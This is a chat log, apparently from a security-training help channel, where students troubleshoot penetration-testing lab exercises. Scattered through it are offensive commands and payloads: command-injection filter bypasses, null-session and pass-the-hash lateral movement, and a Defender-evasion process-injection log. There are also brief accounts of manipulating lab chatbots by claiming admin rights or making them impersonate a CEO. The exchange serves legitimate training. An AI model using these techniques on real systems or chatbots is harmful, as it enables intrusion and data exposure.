Hey everyone. I'm working on the Footprinting module and am currently doing the exercises for SMTP. I'm stuck on the second exercise where I'm enumerating the users.

Honestly I've been struggling with all of the "brute force" kind of enumerations. The scans seem to take forever, and I never seem to find anything.

In similar exercises like for DNS enum, I've ended up looking at the solutions just to see that I was doing the right thing but in a slightly wrong way or just with the wrong wordlist or something simple. I'm hoping that someone can help me figure out how to speed up the process or should I just pivot to a different wordlist or new angle if I don't find anything within a minute or two?

digital pendant
#

Seemed like it failed to pick up the config, given all the resources online and the walkthrough suggest its meant to be available, ill remember to restart if I see that again! ty

brazen light
digital pendant
spring lotus
#

anyone can give a small help on Client-Side Prototype pollution I have a locally working exploit not sure what I am missing on remote

fathom pendant
#

@desert pelican ; please don't share screenshots relating to the AEN module as it's tier 2

desert pelican
fathom pendant
weary crow
#

I don't know how I'll compile the invoker well

#

It's the only one that's giving me issue

fathom pendant
weary crow
#

I checked it but it's a different compile that was used

#

Is there any other that uses javac

fathom pendant
#

probably exists out there, you'll have to do the legwork of researching that on your own

jovial walrus
#

Here on the nibbles web footprinting page we r making an educated guess on the password, is this a better approach than to make use of a wordlist to figure out the password

waxen totem
vapid sierra
#

During the SQLMap Essentials - Attack Tuning module (question "What's the contents of table flag5? (Case #5)"), sqlmap returned a string containing \x02A. The exercise expected the final flag with that sequence replaced by _, but I donโ€™t understand why \x02A should map to _.

Has anyone seen this behavior and could explain it to me please ?

fathom pendant
#

it's weird, but it checks out

#

sometimes the attack tuning thing doesn't properly decode characters and you might wanna rerun the attack a few times

vapid sierra
fathom pendant
glad narwhal
#

Is the DC on AEN US East 1 down for anyone else?

#

Headline: major network outage at inlanefreight!

fathom pendant
#

there's no specific vpn for AEN; also US East isn't the name of any of the vpn files

summer swallow
#

Not sure if this is the right channel to ask, so correct me if not. Would my Academy Student subscription remain active after i graduate from uni ? I verified with chat option

fathom pendant
summer swallow
fathom pendant
#

I mean support can and does regularly check for active enrollment in an institution as far as I know. But that's a question you should ask to support, i'm not staff so I can only guess as to what it is

summer swallow
jovial walrus
#

in the initial foothold section on nibbles how do we decide which plugin to check for rce ?

waxen totem
austere pine
#

Can someone help with the cwes SQL injection skill assesment? I can't even get the answer to the first question. I've tried all the auth bypass payloads and all the solutions I found posted online are on a different site, inlanefreight

weary crow
#

please can someone help me still stuck on the exploiting thick client vulnerability i got the server tho but still stuck cuz it's not running

unborn summit
#

thanks, that worked.

fathom pendant
#

gonna delete since the module is above tier 0; so spoilers ๐Ÿ˜‰

sacred ermine
#

anyone got the
Introduction to Windows Evasion Techniques module
Process Injection section?

should I go with my own technique of getting shell?

bc the given example is not working out in logs its saying:

[10/29/2025 23:27:12] C:\Alpha\ProcessInjection\htb.exe - OK - Undetected by Microsoft Defender Antivirus
[10/29/2025 23:27:12] C:\Alpha\ProcessInjection\htb.exe - OK - Running C:\Alpha\ProcessInjection\htb-fuck.exe
[10/29/2025 23:27:12] C:\Alpha\ProcessInjection\htb.exe - OK - Checking for calc.exe...
[10/29/2025 23:27:57] C:\Alpha\ProcessInjection\htb.exe - OK - Timeout reached, killing process

jovial walrus
#

what do these errors mean on nibbles monitor.sh file ? although i did manage to get a reverse shell

waxen totem
#

remove the -a and should be fine

jovial walrus
waxen totem
jovial walrus
waxen totem
rain mirage
#

ACTIVE DIRECTORY ENUMERATION & ATTACKS
ACL Abuse Tactics

Q) Work through the examples in this section to gain a better understanding of ACL abuse and performing these skills hands-on. Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer.

so in the session they used the user wlay to get access to the user damundsen but i dont have the user wlay , so i assumed i gotta use the user htb-student to see weather which acl can i abuse but when i started the enumeration i cant use any command it just stuck , so i cant even get which all users can i abuse . do i need to use the wlay or im going the correct way and just the server is slow ?

jovial walrus
waxen totem
jovial walrus
digital pendant
#

Is there a more reliable ping sweep for powershell/windows?

powershell ping sweep on AEN came back as False for the host when I was doing a 1.100 sweep, now its come back as True on a much closer range (to test if it was a one off)

#

or is the learning here to re-run sweeps, to double check. IN which case its a low hanging fruit I can do each time

fervent gale
#

I need a nudge with AI Evasion - First Order Attacks - Challenge 1. Have finished all the flags in this module and only this one is left. Am not able to get the right parameters to balance detection vs the limit. Its a new module. If someone has completed this challenge could you pls DM me.

brave field
sweet comet
#

Bumping this. Still stuck and not really understanding how to forward the port I need. Also not able to get a meterpreter shell, but have a normal shell as SYSTEM on BACKUP.

pale island
#

i have tried downloading linpeas several times now and i can't seem to get the linpeas.sh file. anyone know where it is located or how i can get it ?

devout lily
#

Hi everyone, can someone tell me what is the right reasoning to select the right rule and the right mask to resolve the 2nd and the 3rd question of Hashcat section?

#

when i have an hash, i have no additional informations

devout lily
pale island
devout lily
pale island
devout lily
fierce island
#

[โ˜…]$ netcat -nv -p 53 10.129.240.238 50000
Can't grab 0.0.0.0:53 with bind : Permission denied

south mulch
#

Hi! In "Incident Handling Process" module, Skills Assessment's first tasks I'm having troubles with connecting to the target from the pawnbox. I try xfreerdp /v:10.129.119.61 /u:htb-analyst /p:P3n#31337@LOG and I get
[06:50:35:669] [34679:34680] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[06:50:35:670] [34679:34680] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Need hints for fixing it

pale island
autumn pilot
slate gale
#

Hi !
I have a question about Documentation & Reporting module. When we write our report, we need to complete the Attack Chain part. But what if we have many options ? Do we need to precise all of them ? I guess so but if there are 100 ways, it is a lot...

acoustic owl
#

Yes, you have to specify every step, and yes, that can be a lot of text.

brave field
#

Hi. Getting high ping on all EU Academy VPN servers. Previously, I used to get around 150 ms which made the experience smoother, but ever since the recent issue with the EU servers, the ping has remained high. Is there any way to resolve this? Thanks.

Note: I am based in South Asia.

weary crow
weary crow
mellow mist
#

Did someone finish the Using CrackMapExec: Skills Assessment, and could give me a nudge on finding the account

grizzled schooner
#

Think I've found an error in Command Injections | Identifying Filters

They say to use the other operators [ new line and pipe ] I at first didn't see that line, and other operators work, not sure if that's intended

#

Ironically - neither \n or | worked for this

#
oak ruin
#

Hi, I have a question about the Command Injection module. In the section "Bypassing Blacklisted Commands" there is the following exercise:

who$@ami
w\ho\am\i

Exercise: Try the above two examples in your payload, and see if they work in bypassing the command filter. If they do not, this may indicate that you may have used a filtered character. Would you be able to bypass that as well, using the techniques we learned in the previous section?

The first payload works, but the second didn't.
Encoding the backslash as %5C obviously didn't work because of the filter.

Is there an environment variable or something I could use for generating the backslash in Linux?

neon tinsel
#
impacket-wmiexec david@target_ip_here -hashes :david_hash_here
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
inlanefreight\david

C:\>type \\DC01\david\david.txt
Access is denied.

https://academy.hackthebox.com/module/147/section/1638
why doesn't it work, iam logged in under david, but cant read his share

brave field
brave field
oak ruin
# brave field maybe try it with the `character shifting` technique?

Thanks, yes, that's what I'm trying, but I didn't get it working. My VM Bash only understands the shifted version when I echo the command and pipe it to Bash or use eval.

Payloads:
$ w$(tr...
bash: w\ho\am\i: command not found

$ w\ho\am\i
htb-ac-745345

$ eval w$(tr...
htb-ac-745345

$ echo w$(tr...[)i | bash
htb-ac-745345

When I inject that into the web request, the website loads, but the command doesnโ€™t get executed. It might be a command-line error. Even when I shift the pipe character and try to pipe it to Bash, I donโ€™t get a response either. Is there something I'm missing to get it to execute? I've already tried several subshell combinations.

grizzled schooner
steep skiff
#

yoo guys im kinda stuck in file inclusion skill assessment

#

can i PM anyone to give me an insight on what i might do wrong?

sacred rock
sacred rock
grizzled schooner
sacred rock
mellow mist
#

Im on my last days before doing the exam, I'm doing the Skill Assessment for Using CrackMapExec and Im stuck, anyone finished this module who can give me a nudge, I really want to know what I'm missing here

The question is: What's the password of the account you found?
The hint is that I should use a null session, I've tried to following:

proxychains crackmapexec smb 172.16.15.3 -u '' -p ''  --users
proxychains crackmapexec smb 172.16.15.3 -u '' -p '' --shares
proxychains crackmapexec smb 172.16.15.3 -u '' -p '' --pass-pol

proxychains crackmapexec smb 172.16.15.3 -u guest  -p ''  --users
proxychains crackmapexec smb 172.16.15.3 -u guest -p '' --shares
proxychains crackmapexec smb 172.16.15.3 -u guest -p '' --pass-pol

sacred rock
mellow mist
#

I know what you are saying, it's 2 words right?

steel sundial
#

Hi All, just started learning & already hit a snag, I'm following the "meow write up" but the nmap is not bringing anything up. what am I doing wrong? I've typed in sud nmap -sV {IP address} i pasted the actual IP address ๐Ÿ™‚

mellow mist
steel sundial
#

pwnbox... i think

mellow mist
steel sundial
#

yes

#

i think ๐Ÿ™‚

mellow mist
#

Target is running?

steel sundial
#

i ping'd it and it was connected

mellow mist
#

did you try to run nmap with -Pn

severe monolith
#

Tunnel vision will cause this, as I ran into the same issue. Spawn the target and connect to it. There will be a web interface for you to test your input and completion will give you the flag. Sharing in case others ran into the same issue.

strange trench
#

That did happen to me and when I attempted the next day after not getting anywhere I realized that

regal ore
#

hi amigos
i'm on Skills Assessment - Password Attacks
i got initial access to DMZ01 machine and then I'm unable to make progress.
tried to forword port from the dmz01 and there is no result!!!!!

any help frendos?

clever helm
#

Hello anyone did process injection Attacks and detection module ? How much of a good is it in terms of attacking perspective

edgy berry
#

can someone help me to do this. this is SQL Injection Fundamentals skill assessment.

grizzled schooner
#

Does anyone have 2 seconds? I'm just not sure what this question is asking for as an answer lol

Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1

I have the output I just don't know what it wants

#

Or this command is working just not outputting the answer? Lol?

hexed oyster
#

Working on API Attacks -> Broken Authentication: should I be getting this many errors?

grizzled schooner
fathom pendant
edgy berry
fathom pendant
#

tail -n 1 -> should only give 1 output

fathom pendant
#

also try forcing an error

grizzled schooner
edgy berry
fathom pendant
grizzled schooner
#

I've tried 4 different ways, all have different outputs, that aren't aligning with each other, and it's the same command lol

fathom pendant
edgy berry
terse bloom
#

If I follow the Hex signature in the memory map and try to dump to file, it looks like an unfinished program and cannot be inspected properly. honestly getting lost at this section with 0 reverse knowledge

zenith token
#

Could anyone give me a few hints regarding the Module sqlmap -> Challenge6... I have not worked too much with SQL before and I have no clue, how I should get to the correct prefix? Any tipps?

fathom pendant
fathom pendant
terse bloom
fathom pendant
glad ginkgo
#

Hey guys I need help with something on Attacking Enterprise Networks module

nocturne geyser
#

Hello, I'm having a problem in the Linux Fundamentals section, specifically in the "Filter Content" part of the last question where I'm asked to use curl. I don't know if my command is wrong or if I've missed something. If someone could help me out, that would be great.

#

As you can see, I did it offline in the first instance, and online in the second (screenshot).

remote smelt
#

I've also been stuck in this part for a few days

nocturne geyser
#

It's not easy to understand, hopefully someone can help us x)

fathom pendant
nocturne geyser
#

Can I do it directly from my Linux machine on my PC?

violet cipher
#

I just finished working on The Live Engagement module under shells & payloads section. Would anyone be able to let me know how we were we supposed to find creds for host 1 โ€˜manageโ€™?

#

If spoiler pls delete

woven zenith
# violet cipher If spoiler pls delete

from here its starting to get tougher if you will just follow the module lectures. you need to think outside the box. However, if you haven't look at the "hints" you need to otherwise you'll scratch your trying to figure out what's next. I also find trying to take a peek at the solution after doing all things is not bad at all.

spring trail
#

Guy i need help, i already add inlanefreight.local to the hosts file, but when i used ping or getent hosts it can't resolve the name why?

if i just ping the IP address, it works normally.

steep skiff
#

Yoo guyss, i need help with the file inclusion skill assessments, my RCE attempts is always failed and im sure it is using the method i use

violet cipher
brave field
late topaz
#

I am currently working on API Attack module, and stuck in Broken Object Property Level Authorization

#

Anyone available for help\

#

I am not able to find one of the apis for the relevant role

grizzled schooner
brave field
brave field
fathom pendant
#

Try scanning common ports like 445,3389,5985 etc... etc

#

Otherwise try a different pivoting method/tool

round surge
#

I was able to get into another machine however I am now struggling to transfer files from the Windows server onto my attack host. I have tried moving the file into an SMB share and doing it that way, but i can't access the share.

fathom pendant
round surge
#

let me give that a try

#

Got it

#

Legit spent an hour trying to get it through command line....

#

Thank you

spiral sapphire
#

For Module "MSSQL, Exchange & SCCM Attacks" on Section "Introduction to SCCM" I'm facing an issue using pxethief.py. I'm using exactly the same command as given on the module and I keep getting this error response:

[-] No DHCP responses recieved from MECM server 172.50.0.30. This may indicate that the wrong IP address was provided or that there are firewall restrictions blocking DHCP packets to the required ports

I already tried to reset the machine, but it's still not working. I also tried other interal IP addresses as well I found while enumerating. Nothing seems to work. If someone can help, thanks!!!

spring trail
spiral sapphire
vague lintel
round surge
spiral sapphire
vague lintel
#

oh no i mean your base machine

spiral sapphire
spring trail
vague lintel
#

swap to bridged

round surge
spring trail
vague lintel
#

only thing I can think of atm - can cause dhcp issues

spiral sapphire
# vague lintel swap to bridged

Do you mean that's the reason I couldn't solve it? How does the network config affect HTB's machine as it's internal network?

round surge
#

It has been a constant nightmare of connection errors. And now I am trying to get the NTDS.dit file and am unable to via netexec because of these issues that I am having.

vague lintel
#

it's like a 2 second thing anyway so like if it doesn't work meh

spiral sapphire
round surge
vague lintel
#

nat drops l2 broadcast packets - only reason i suggested it >.<

spiral sapphire
vague lintel
#

na i just started but work stuff

#

that's actually the exact module i'm excited for since relevant

spiral sapphire
vague lintel
#

no no the cape material X:

#

but that's the module i'm after ya

#

since sccm attacks are kind of hot rn

spiral sapphire
vague lintel
#

can you ping it and all that?

spiral sapphire
vague lintel
#

you already reset it too

spiral sapphire
foggy monolith
#

On this same section now myself and having the same problem. Nothing gone over in the section seems to work.

@acoustic owl any ideas?

vague lintel
#

^ this guy has a cape lol maybe he can help XD

foggy monolith
vague lintel
#

are you allowed to post the actual cmd?

spiral sapphire
spiral sapphire
spiral sapphire
vague lintel
#

thx @foggy monolith x; sorry if I tossed ya under the bus - sooo didn't mean to

vague lintel
#

i always screw up discord rules in srvrs bc i'm in so many ;/

#

so i am trying to be careful

spiral sapphire
# vague lintel ya

Sure, I don't see how it'd be a spoiler:

python .\pxethief.py 2 172.50.0.30

foggy monolith
#

Maybe try a lab reset too. Also, I was logged in as the test user, not sure if that helps.

spiral sapphire
vague lintel
foggy monolith
vague lintel
#

I started it and literally stopped myself :3

#

since I actually have to study and focus on the cape

#

and I'm super adhd soooooo I would have just ended up doing that and not what I needed

#

lol

foggy monolith
neat remnant
#

Can someone provide a real world example of how I could apply the model learned in โ€œQuestioningโ€ under โ€œThe processโ€ in the โ€œLearning processโ€ module?

It was a lot of reading and seemed a bit too much. I donโ€™t really get the takeaway lol. Or is it the whole visual model / diagram that should be used?

Thanks in advance for your time everyone!

spiral sapphire
fathom pendant
neat remnant
fathom pendant
#

Im getting errors โŽ
Im getting <specific error> โœ…

neat remnant
#

Great, I thought so. Very, very long winded way to explain the concept ๐Ÿ˜…

It probably helped me most that Iโ€™ve known about similar models / concepts beforehand.

Maybe my brain just hasnโ€™t been working for the past three days. Thanks for your time clarifying!

fathom pendant
late rapids
#

Howdy! I'm currently working on the Footprinting module, and in the SMB section. I've managed to connect to the correct SMB share, and found the flag.txt as it requests, however the flag does not seem to be accepted by the answer section, and states it as being incorrect. I'm not quite sure where to go from here, because of that hah!

waxen totem
late rapids
#

Its formatted correctly as far as I can tell, cleanly copied, etc

waxen totem
late rapids
#

It is indeed one of the HTB{} flags

waxen totem
reef sonnet
#

arent there supposed to be creds to rdp?
it is in the "YARA & Sigma for SOC Analysts"

autumn pilot
#

check the hint

reef sonnet
#

oh that works aswell, tysm!

midnight bough
#

Hi all, I'm new and asking for any help with this module:
Attacking AI - Application and System
Section: Rogue Actions

I appreciate any suggestions or guidance on this! Or even anyone facing the same issue. ๐Ÿ‘

So far I can successfully claim admin and the chatbot says SQLQuery plugin is available, and I've checked the database: db, tables: items, and column: id. It only contains ids: 1-4 as far as I can tell.

Should I be looking at a different attack vector entirely?

I've also tried the username injection, however, little success with that method as the chatbot skips over displaying username with payload.

orchid gust
#

Hello!
I have troubles connecting to the Windows targets in the Windows Fundamentals module. It dose not matter if i connect over my local machine using the VPN or if i use the PWNBOX. The connection gets permanently terminated. I also tryed to spawn the target agein, but without success. Any help is apprichiated!

fathom pendant
#

try changing vpn regions, also making sure you're not using both the VPN and the PWNBOX at the same time, use TCP vpn

austere pine
fathom pendant
#

@austere pine you're thinking about it wrong; when you force an error that means you may be doing something right (even if the error isn't reflected back at you)

austere pine
#

i dont understand. is my input going to the database even if its getting sanitised? i dont know how i can get what i want with that since, nothings worked so far

fathom pendant
#

i will say you were onto something with the parameter @austere pine ;

austere pine
#

thanks for the help prayge my brain is fried rn. i will sleep on it and maybe when i wake up the answer will appear

fathom pendant
cedar void
#

I am having trouble rdp'ing(with xfreerdp) into remote machines and my standard way is not working(i usually add the dynamic-flag) because when I do it the standard way the screen is usually greyed out. I tried all of the recommendations online and they are not working.

xfreerdp /v:10.129.250.12 /u:.\Administrator /p:"AnotherC0mpl3xP4$$" /size:1920x1080 /bpp:32 /cert:ignore /rfx

[04:24:39:861] [13938:13939] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[04:24:39:861] [13938:13939] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[04:24:39:861] [13938:13939] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[04:24:39:861] [13938:13939] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

What do you recommend I do

fathom pendant
#

bash is evaluating $$ to the current shell PID

#

single quotes is strict string parsing, not hybrid

#

also you don't need to do the .\ for the username

#

NTSTATUS: STATUS_LOGON_FAILURE <- this indicates an error with the username and/or password

cedar void
#

xfreerdp /v:10.129.250.12 /u:.\Administrator /p:'AnotherC0mpl3xP4$$' /size:1920x1080 /bpp:32 /cert:ignore /rfx
[04:38:48:451] [35358:35359] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[04:38:48:451] [35358:35359] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[04:38:48:451] [35358:35359] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[04:38:48:451] [35358:35359] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

cedar void
fathom pendant
#

yes

#

remove that as well

cedar void
spiral sapphire
narrow nacelle
#

Yep, I'm in the "Citrix Breakout" module and when I rdp into the machine I get the Xfce desktop environment. Is that intended? It doesn't make much sense to me

spiral sapphire
narrow nacelle
#

Yes, EU server. Earlier I couldn't even log in. Now I get this Xfce desktop which is weird, because it's unix based and I'm supposed to work on a Windows machine

fathom pendant
#

try changing to US vpn server

spiral sapphire
narrow nacelle
#

Ok, thanks

brave field
fathom pendant
brave field
fathom pendant
#

reach out to support, but if it's the EU servers having issues then you're gonna have to wait for the EU servers to stop being silly, or suffer the lag of US servers

round surge
#

Yes you can

grizzled schooner
#

Can I get a nudge for the Command Injections | Skill Assessment? I'm damn near pulling my hair out, I've tried damn near everything I can think of, and all I get in return from Burp is a 302 Found but no contents. I don't know if I have the wrong injection point or what, but I'm going crazy

summer tapir
#

Currently I am working on the Applications of AI in Infosec course skills assessment. I've created the model, trained it using GPU and evaluated it locally with accuracry ~94%. However, when I try to uplaod it I get "invalid model file".

Does anyone know if it is required to upload a .joblib or is a .pth allowed?

mystic fjord
#

anyone else have a lot of truble with the module "Intro to C2 Operations with Sliver "?

#

The RDP and the connection in general are extremely unstable

dark jay
#

can someone help me with File Upload Attacks whitelist filters module? i cannot seem to fuzz the correct extension and also i can upload for instance shell.php\x00.gif but i cannot execute gif file any hints to help me out? i've been stuck for hours

drowsy grove
#

Hey all, in the socks over rdp module in the double pivoting section, this just doesn't seem to work:

regsvr32.exe SocksOverRDP-Plugin.dll
#

This is all I get haha

#

Real time threat protection is turned off btw

foggy monolith
#

Were you able to get it?

drowsy grove
digital pendant
#

Try this:

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://IPHERE -H 'Host:FUZZ.inlanefreight.local'

and make sure to use -fs when you have an idea which size is incorrect so you can filter it out

#

update local to .com if that is the target ofc

#

The above works for my needs, so should yours. Not sure otherwise

cosmic vine
#

does inlanefreight.com respond to icmp requests? i'm trying to ping it but not getting anything. i'm not sure if i'm having network issues

digital pendant
tight mesa
#

Hi there, anyone willing to discuss about SSRF API module attack path?, to send he/she a DM!!

fathom pendant
fathom pendant
fathom pendant
#

also @cosmic vine don't reveal potential answers, even behind spoiler tags...

digital pendant
fathom pendant
digital pendant
#

I deserve that

fathom pendant
#

all good; you tried to help, it just wasn't applicable in this specific instance

tawny flint
#

Hello, someone could help with the API Attak skills assessment? ||Trying to reset a supplier password with the security question... ||

nova pivot
#

Hello there!
Quick question ffuf wise :
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://IP:PORT/w2ksvrus/FUZZ.html -e .php,.html,.txt,.bak,.js -v
โ†’ This command will fuzz for .../config.php.html, .../config.html.html, .../config.txt.html,... yadeeyada, correct ?

fathom pendant
#

correct, it appends the extension (From what I recall) directly after, i mean one way to know for sure is to just test it out... though why you'd do a double ext is beyond me

foggy monolith
#

Check your DMs, I sent you 2 of them on this matter.

foggy monolith
cosmic vine
vapid sierra
#

Hi all โ€” Iโ€™m blocked on the SQLMap essentials - Skills Assessment. Iโ€™ve been probing the app with Burp and reviewed every request in the proxy, but there are no GET requests with query params and no POSTs that look relevant. I also tried interacting with the site (commenting, adding products to cart, going through checkout, clicking blog links) and still canโ€™t find a suitable input point. If someone whoโ€™s completed it can share a hint about where to look next (not the full solution), that would be super helpful. Thanks!

foggy monolith
# foggy monolith Check your DMs, I sent you 2 of them on this matter.

For context, I was able to ||get the chatbot to pretend to be the CEO while divulging information that would absolutely get any CEO banned from his or her own company|| but the prompt necessary to do that was so long that I got a "Prompt length is longer than max length" error (screenshots in DM if you're reading this @terse sage) when throwing the summary bot at the resulting conversation. @icy dagger any ideas?

silk lagoon
vapid sierra
silk lagoon
#

Whatโ€™s the question

fathom pendant
fathom pendant
#

Likely overlooked something

silk lagoon
#

@vapid sierra then in that case youโ€™re on that right track and itโ€™s in one of those you mentioned, pretty obvious to what the website is all about..

vapid sierra
#

mmmh thx a lot !

foggy monolith
silk lagoon
fathom pendant
vapid sierra
#

Okay, I found it โ€” it was a bit ambiguous.

#

Thx again

spiral yarrow
#

I wanna help In HTTPs/TLS Attacks Module Skill Assessment can I DM anyone please

foggy monolith
wary marsh
#

Find out the machine hardware name and submit it as the answer. Could someone help me with this?

fathom pendant
wary marsh
drowsy grove
drowsy grove
#

Hmm, Iโ€™m getting this error on literally the first machine lol

fathom pendant
#

they're saying they used ligolo to bypass the fuckery i think lol.

crimson moon
#

pivoting tunnelling path in remote/reverse port fwding w/ ssh finding it hard to get a reverse shell is there a step missing in the module? I'm following exactly as laid out in the module but feels like there's something missing bc it mentions to download the payload in windows box prior to getting a reverse shell executed of the same box? This is separate from challenge questions

civic inlet
#

sorry guys I know this is the wrong chat for this but Im struggling with the machine Reddish and I remember hearing that it's broken, is that still the case?

Sorry!

drowsy grove
civic inlet
#

nevermind I got it LETS GOOOOO

waxen totem
#

@vast sun please don't post flags, check for leading/trailing spaces

brave field
nova pivot
tawny flint
#

Hi, I am a bit lost with the API Attack skill assessment, could someone give me a nudge to bypass the security question?

sacred ermine
sacred ermine
digital pendant
tawny flint
digital pendant
#

The answer to the securityquestion isn't actually in the API output in case you were wondering why you can't find the word?

#

can dm if you want to take this offline. GL anyway!

rare condor
#

hey

#

on Credential Hunting in Linux module

#

the Examine the target and find out the password of the user Will. Then, submit the password as the answer. machine is not work correctly

#

when I connect ssh after 5 min it stuck and I can do anything, also cant ping or scan it for status

sharp pecan
#

Hi

#

can anyone help me in the module Enumerating & Retrieving Password Policies

sacred ermine
sharp pecan
#

AD

#

What is the default Minimum password length when a new domain is created? (One number)

#

from CPTS

#

Anyone has any clue??

sharp pecan
#

no

sacred ermine
#

but why can't you enum? you have any type of access ? e.g. smb ?

#

you can pull it via smb

sharp pecan
#

no there are no ports open only 22 and 3389

#

so thats why I came here that how u all enum it

#

??

digital pendant
# sharp pecan ??

Kraddy this information is in the module text...

Theres a table with the data you require. Re-read the section text on Domain Password Policy.

sharp pecan
#

Tool Ports
nmblookup 137/UDP
nbtstat 137/UDP
net 139/TCP, 135/TCP, TCP and UDP 135 and 49152-65535
rpcclient 135/TCP
smbclient 445/TCP

#

this right??

#

none of these ports are open

#

so crackmap enum4linux rpclient none of them worked

digital pendant
#

Why are you enumerating for the password policy when the question is asking you for the Minimum password length. Which is in the module text ๐Ÿ™‚

fathom pendant
sharp pecan
#

8 is not working @digital pendant

#

so I tried 7 it worked

fathom pendant
#

even if it's in the text; you won't always be lucky with the text aligning with the answers

digital pendant
#

I suppose so Marcie, but in this case "I tried 8" and its 7 in the table above, doesn't make much sense

sharp pecan
#

ok I got it sorry man this module was just crap I thought I will enumerate it

digital pendant
fathom pendant
sharp pecan
#

its not like that lee

fathom pendant
#

it really is

dark jay
#

hello can anyone help me with file upload type filters, i have tried evertyhing, bruteforced content-type, after that i did bruteforce all php extensions that work with content-type and none of them gives me shell, i also bypassed MIME type checking

sharp pecan
#

ok so why than give us the ssh if the answer was already bove

digital pendant
fathom pendant
dark jay
#

ye images.php\x00.jpg.gif

#

like this for instance

sharp pecan
fathom pendant
dark jay
#

or images.pht.jpg

fathom pendant
digital pendant
#

The domain of that specific host that you must spawn, will have the pwMinLength value set, and it wants you to go find out that information now, using what you learnt in the module. @sharp pecan

fathom pendant
digital pendant
#

learn something new every day, ty

sharp pecan
fathom pendant
#

@dark jay the module is above tier 0 so please try and avoid spoiling things

sharp pecan
#

yeah but there were only 2 ports that are opened 22, 3389 how will try --- crackmapexec, rpc

digital pendant
#

SSH to the user with credentials provided Kraddy, enumerate policy from there....

sharp pecan
#

yes did that

#

tthan

fathom pendant
sharp pecan
#

ok than how will we enumerate password length

#

I am not getting that part

fathom pendant
#

also as a slight correction; the MODULE name is Active Directory Enumeration and attacks, the SECTION is Enumerating & Retrieving Password Policies

sharp pecan
#

there must be some commands

#

??

sharp pecan
fathom pendant
#

if it's a domain joined machine then you might have to enumerate against an internal machine

sharp pecan
#

yes I did that

fathom pendant
#

the module gives you LOADS of example commands to enumerate against, not the 'external' 10.129 machine

sharp pecan
#

there was an Ip I enumerate for that only

fathom pendant
#

i.e. a machine on the 172.16.x.x network

sharp pecan
#

see

digital pendant
#

Sorry Kraddy, won't be accepting the DMs for this. You're in good hands ๐Ÿ˜„

fathom pendant
#

yeah that's the internal ip OF THAT MACHINE

#

meaning the 10.129.x.x ip and 172.16.5.225 map to the SAME host on the network, just different subnets

sharp pecan
#

yeah but when I am typing commands to enumerate for this Ip not getting any results

sharp pecan
digital pendant
#

Dual-homed ^

sharp pecan
fathom pendant
#

i literally copy/pasted the first command given and it provided me with output

sharp pecan
#

but when I ssh for the given machine and than tried to enumerate for teh internal machine using above commands I am not getting any output

#

which one

fathom pendant
#

literally THE FIRST ONE

sharp pecan
#

rpcclient??

fathom pendant
#

the cme one

sharp pecan
#

I will show u mine

fathom pendant
#

module is above tier 0; don't post for spoilers

sharp pecan
#

ok will dm u than

fathom pendant
#

i'm not accepting dms at this time

sharp pecan
#

ok but I swear IM using the exact same comamnd cme and not getting any output

fathom pendant
#

are you doing it from the provided attack host you ssh into?

#

because otherwise you can't reach the internal 172.16.x.x network (unless you decided to do some pivoting)

digital pendant
#

your terminal should look something like this:

โ”Œโ”€[htb-student@ea-attack01]โ”€[~]
โ””โ”€โ”€โ•ผ $

sharp pecan
#

๐Ÿ˜† man I know im in that only

fathom pendant
#

i'll also recant a bit; the first question IS intended to be answered from the reading based on the wording of the question. The second one however, is meant to be enumerated

fathom pendant
#

have you tried restarting the target? maybe (for whatever reason) the environment didn't spawn properly

sharp pecan
#

plenty of times

fathom pendant
#

try changing vpn regions then, from EU -> US or US -> EU sometimes the entire shift kicks things into gear (you'll need to either restart the pwnbox or download a new vpn depending on how you're doing the questions)

sharp pecan
#

I first ssh into the host from my attacker machine and from there I was able to ping the IP that is internal

#

im doing from pwnbox

digital pendant
#

I need to go now, hopefully find the answer

fathom pendant
sharp pecan
#

yes lee but when I nmap from the machine that I ssh into only 2 ports were opened so how can i enumerate 139, 445 when they are not opened at first place

fathom pendant
#

they should be open

#

when I run nmap from the provided machine they show as open

#

if you continue having issues and resetting the environment doesn't work and changing vpns doesn't work then reach out to website support

compact patrolBOT
fathom pendant
#

yes: they do work on weekends, just at a lower capacity, so response times are a lot slower

sharp pecan
#

they are not opened

fathom pendant
sharp pecan
#

ok lmt

rare condor
#
โ”Œโ”€[eu-academy-1]โ”€[10.10.15.155]โ”€[htb-ac-1576291@htb-qsk7hzkbq2]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ xfreerdp /v:10.129.33.10 /u:mendres /p:Inlanefreight2025!
